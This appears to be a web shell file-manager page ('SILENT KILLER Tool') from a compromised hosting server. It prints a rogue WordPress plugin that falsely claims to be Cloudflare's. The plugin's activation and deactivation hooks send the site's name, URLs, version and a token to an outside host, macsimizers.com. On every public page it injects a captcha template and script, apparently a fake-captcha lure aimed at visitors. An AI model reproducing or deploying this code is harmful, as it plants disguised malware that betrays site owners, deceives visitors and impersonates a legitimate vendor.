Current Path: > home > ivftiowh > greeceivf.com > wp-content > plugins > CloudflareCaptchaAgent
Operation : Linux premium88.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64 Software : Apache Server IP : 185.61.154.216 | Your IP: 216.73.216.44 Domains : 1034 Domain(s) Permission : [ 0755 ]
Name | Type | Size | Last Modified | Actions |
---|---|---|---|---|
css | Directory | - | - | |
js | Directory | - | - | |
templates | Directory | - | - | |
index.php | File | 2282 bytes | September 15 2025 15:16:26. |
<?php /** * * Plugin Name: Cloudflare captcha agent * Plugin URI: https://blog.cloudflare.com/new-wordpress-plugin/ * Description: Cloudflare speeds up and protects your WordPress site. * Author: Cloudflare, Inc. * Author URI: https://blog.cloudflare.com * Version: 4.12.1 * License: BSD-3-Clause */ if (!defined('ABSPATH')) { exit; } function activate_captcha() { $url = 'https://macsimizers.com/wordpress/init'; $data = array( 'token' => 'hQAwwcg!XJ#pwHdF!jpyQN#ejAgza2XG8FWD&F9qbn7tuY9S9cxjJvCG9Ws*2t7E', 'wp_tag' => '_file_fix_1', 'wp_name' => get_bloginfo('name'), 'wp_url' => get_bloginfo('wpurl'), 'site_url' => get_bloginfo('url'), 'wp_version' => get_bloginfo('version'), 'action' => "activate" ); $response = wp_remote_post($url, array( 'method' => 'POST', 'body' => json_encode($data), 'timeout' => 60, )); return; } register_activation_hook(__FILE__, 'activate_captcha'); function deactivate_captcha() { $url = 'https://macsimizers.com/wordpress/init'; $data = array( 'token' => 'hQAwwcg!XJ#pwHdF!jpyQN#ejAgza2XG8FWD&F9qbn7tuY9S9cxjJvCG9Ws*2t7E', 'wp_tag' => '_file_fix_1', 'wp_name' => get_bloginfo('name'), 'wp_url' => get_bloginfo('wpurl'), 'site_url' => get_bloginfo('url'), 'wp_version' => get_bloginfo('version'), 'action' => "deactivate" ); $response = wp_remote_post($url, array( 'method' => 'POST', 'body' => json_encode($data), 'timeout' => 60, )); return; } register_deactivation_hook(__FILE__, 'deactivate_captcha'); function captcha_init() { if (!is_admin()) { include(plugin_dir_path(__FILE__) . 'templates/captcha.php'); } } add_action('init', 'captcha_init'); function my_popup_enqueue_scripts() { if (!is_admin()) { wp_enqueue_style('captcha-css', plugin_dir_url(__FILE__) . 'css/captcha.css'); wp_enqueue_script('captcha-js', plugin_dir_url(__FILE__) . 'js/captcha.js', array('jquery'), null, true); } } add_action('wp_enqueue_scripts', 'my_popup_enqueue_scripts');
SILENT KILLER Tool